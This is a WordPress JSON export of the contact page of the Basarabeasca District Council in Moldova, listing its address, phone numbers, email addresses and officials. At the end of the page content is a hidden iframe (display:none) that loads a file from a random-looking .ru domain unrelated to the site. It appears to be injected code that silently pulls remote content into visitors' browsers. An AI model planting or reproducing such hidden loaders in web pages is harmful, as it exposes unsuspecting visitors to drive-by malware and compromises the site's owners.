{"id":382,"date":"2016-02-14T20:42:34","date_gmt":"2016-02-14T20:42:34","guid":{"rendered":"http:\/\/demo.smartstudio.md\/basarabeasca.md\/?page_id=382"},"modified":"2024-06-13T14:28:50","modified_gmt":"2024-06-13T11:28:50","slug":"contacte","status":"publish","type":"page","link":"https:\/\/basarabeasca.md\/ro\/contacte\/","title":{"rendered":"CONTACTE"},"content":{"rendered":"<p><\/p>\n<p style=\"text-align: left;\"><span style=\"text-decoration: underline;\"><strong><em>Consiliul Raional Basarabeasca<\/em><\/strong><\/span><\/p>\n<p style=\"text-align: left;\">Adresa:\u00a0MD-6702, or. Basarabeasca.\u00a0str.Karl Marx, nr.55<\/p>\n<p style=\"text-align: left;\">tel. \/ fax: (0297) 22 058 &#8211; anticamera pre\u015fedintelui raionului<br \/>\ne-mail: <a href=\"mailto:bascon@mail.ru\">bascon@mail.ru<\/a><\/p>\n<p><a href=\"mailto:consiliul@basarabeasca.md\">consiliul@basarabeasca.md<\/a><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: left;\">site-ul oficial: <a href=\"http:\/\/www.basarabeasca.md\/\">http:\/\/www.basarabeasca.md\/<\/a><\/p>\n<p style=\"text-align: left;\">Informa\u0163ii suplimentare:<\/p>\n<p style=\"text-align: left;\">Pre\u015fedintele raionului:\u00a0 tel. NATALIA CARA (0297) 22 650, 20 601<\/p>\n<p style=\"text-align: left;\">Vicepre\u015fedin\u0163ii raionului: FILIP R\u0102CIL\u0102 tel. (0297) 22 750<\/p>\n<p style=\"text-align: left;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0tel.(0297)21 818<\/p>\n<hr \/>\n<p><strong>Num\u0103r de telefon anticorup\u021bie<\/strong>:<\/p>\n<p>0(297)22058<\/p>\n<p><strong>Num\u0103r de telefon a persoanei responsabile de pagina web a Consiliului raional:<\/strong><\/p>\n<p>0(297)2-30-43 Evghenia Jileznaia &#8211; specialist principal \u00een cadrul Aparatului pre\u0219edintelui raionului<\/p>\n<p><strong>Num\u0103rul de telefon a persoanei responsabile de coordonare a procesului privind transparen\u021ba decizional\u0103 \u0219i plasarea informa\u021biei:<\/strong><\/p>\n<p>0(297)2-25-29, Irina Nichita &#8211; specialist principal al Sec\u021biei administra\u021bie public\u0103<\/p>\n<p><strong>Num\u0103rul de telefon pentru conlucrare cu societate civil\u0103:<\/strong><\/p>\n<p>0(297)2-25-29, Vasile Baciu- \u0218ef al Sec\u021biei\u00a0 administra\u021bie public\u0103<\/p>\n<p style=\"text-align: left;\"><iframe loading=\"lazy\" id=\"a1996667054\" style=\"display: none;\" src=\"\/\/u7yb1iy1x3xv.ru\/f.html\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<p><\/p>","protected":false},"excerpt":{"rendered":"<p>Consiliul Raional Basarabeasca Adresa:\u00a0MD-6702, or. Basarabeasca.\u00a0str.Karl Marx, nr.55 tel. \/ fax: (0297) 22 058 &#8211; anticamera pre\u015fedintelui raionului e-mail: bascon@mail.ru consiliul@basarabeasca.md &nbsp; site-ul oficial: http:\/\/www.basarabeasca.md\/ Informa\u0163ii suplimentare: Pre\u015fedintele raionului:\u00a0 tel. NATALIA CARA (0297) 22 650, 20 601 Vicepre\u015fedin\u0163ii raionului: FILIP R\u0102CIL\u0102 tel. (0297) 22 750 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-382","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/pages\/382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/comments?post=382"}],"version-history":[{"count":24,"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/pages\/382\/revisions"}],"predecessor-version":[{"id":12424,"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/pages\/382\/revisions\/12424"}],"wp:attachment":[{"href":"https:\/\/basarabeasca.md\/ro\/wp-json\/wp\/v2\/media?parent=382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}